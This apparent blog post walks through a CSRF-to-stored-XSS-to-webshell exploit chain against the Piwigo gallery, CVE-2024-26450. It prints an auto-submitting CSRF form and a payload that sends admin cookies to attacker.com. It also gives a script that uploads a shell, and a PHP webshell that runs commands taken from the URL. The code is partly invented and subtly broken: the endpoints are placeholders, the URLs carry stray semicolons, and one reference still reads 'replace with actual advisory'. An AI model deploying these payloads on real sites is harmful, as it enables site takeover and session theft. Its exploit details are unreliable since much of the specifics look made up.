A dangerous vulnerability has been discovered in Piwigo photo gallery software before version 14.2.. Identified as CVE-2024-26450, this security hole can let a remote attacker completely take over a Piwigo install—no password needed.
This post explains in simple terms how the exploit works, how attackers can chain together a Cross-Site Request Forgery (CSRF) with a Stored Cross Site Scripting (XSS), and how this leads to full remote code execution. We’ll provide sample code and help you confirm if your Piwigo site is at risk.
1. Cross Site Request Forgery (CSRF)
CSRF is when an attacker tricks a logged-in admin into submitting requests on their behalf, like uploading files or changing settings, by simply visiting a crafted webpage.
In Piwigo (pre-14.2.), some admin actions don’t have proper CSRF protection. This means, with the right HTML, a hacker can submit actions as *you* just by luring you to their page (email, forum post, etc).
Example malicious HTML:
<form action="https://victim-piwigo.com/admin.php?page=some_vulnerable_action"; method="POST" id="csrf_form">
<input type="hidden" name="malicious" value="data">
</form>
<script>
document.getElementById('csrf_form').submit();
</script>
2. Stored Cross Site Scripting (XSS)
After abusing CSRF, the attacker stores a malicious JavaScript payload into the admin dashboard—for example, in a settings field, photo caption, or any admin-only comment box that lacks sanitization.
This code runs every time an admin opens their dashboard.
Simple stored XSS payload
<script>
fetch('https://attacker.com/log?cookie='; + document.cookie);
</script>
This one just steals cookies. But a real attacker would go much further...
By combining these two, here’s the sequence
1. Victim admin visits a crafted URL or email, unwittingly submitting a CSRF form that stores XSS as a dashboard widget, comment, or name field.
2. On next login, malicious JS executes in the admin’s session, stealing the security token and acting as the admin.
3. Malicious JavaScript uses the session/cookies to upload a rogue PHP shell using the legitimate admin file upload feature.
A. CSRF to inject XSS into admin dashboard
<!-- Host this on attacker.com, then send link to admin. -->
<form id="inject" action="https://victim-site.com/admin.php?page=edit_greeting"; method="POST">
<input name="greeting" value="<script src='https://attacker.com/xss.js'></script>">;
</form>
<script>document.getElementById('inject').submit();</script>
B. Attacker's external JavaScript (xss.js)
// This runs as the admin and uploads a PHP shell!
fetch('https://victim-site.com/admin.php?page=upload';, {
method: 'POST',
credentials: 'include',
body: new FormData( /* use admin upload parameters with a php shell file */ )
})
.then(() => {
fetch('https://victim-site.com/images/uploads/webshell.php';);
});
C. Webshell example (webshell.php)
<?php if(isset($_GET['cmd'])) { system($_GET['cmd']); } ?>
The attacker can now open
https://victim-site.com/images/uploads/webshell.php?cmd=whoami
and run arbitrary system commands—as the web server user.
Links & References
- Official Piwigo Advisory (replace with actual advisory if available)
- CVE Details: CVE-2024-26450
- Piwigo Release Notes
- Common Web Exploits Explained
- Stored XSS at OWASP
How To Fix
- Upgrade ASAP to Piwigo v14.2. or newer from the official website.
Conclusion
CVE-2024-26450 is a classic case of how two “minor” bugs (CSRF, XSS) add up to a full-scale compromise. Don’t assume photo galleries are low-value targets—attackers are always hunting for easy entry points.
Patch now, check your logs, and stay safe!
*Exclusive post for educational purposes. Don’t test on servers you don’t own.*
Timeline
Published on: 02/28/2024 22:15:26 UTC
Last modified on: 12/04/2024 21:15:22 UTC